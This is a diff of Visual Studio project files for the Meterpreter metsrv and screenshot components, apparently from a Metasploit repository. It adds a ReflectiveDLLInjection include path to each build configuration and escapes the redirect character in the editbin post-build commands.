@ -251,7 +251,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\metsrv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -270,7 +270,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\openssl\include;..\..\source\server;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -311,7 +311,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\metsrv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -330,7 +330,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\openssl\include;..\..\source\server;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -371,7 +371,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\metsrv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -392,7 +392,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>false</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -437,7 +437,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\metsrv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -458,7 +458,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>false</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -503,7 +503,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\metsrv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -524,7 +524,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\openssl\include;..\..\source\server;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -568,7 +568,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\metsrv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -589,7 +589,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\openssl\include;..\..\source\server;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -633,7 +633,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\metsrv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -675,4 +675,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

34
c/meterpreter/workspace/screenshot/screenshot.vcxproj
View File

@ -130,7 +130,7 @@
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -150,7 +150,7 @@
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -160,7 +160,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -180,7 +180,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -193,7 +193,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -224,7 +224,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -237,7 +237,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -268,7 +268,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -281,7 +281,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -301,7 +301,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -314,7 +314,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -334,7 +334,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -350,7 +350,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -380,7 +380,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -396,7 +396,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -426,7 +426,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -455,4 +455,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>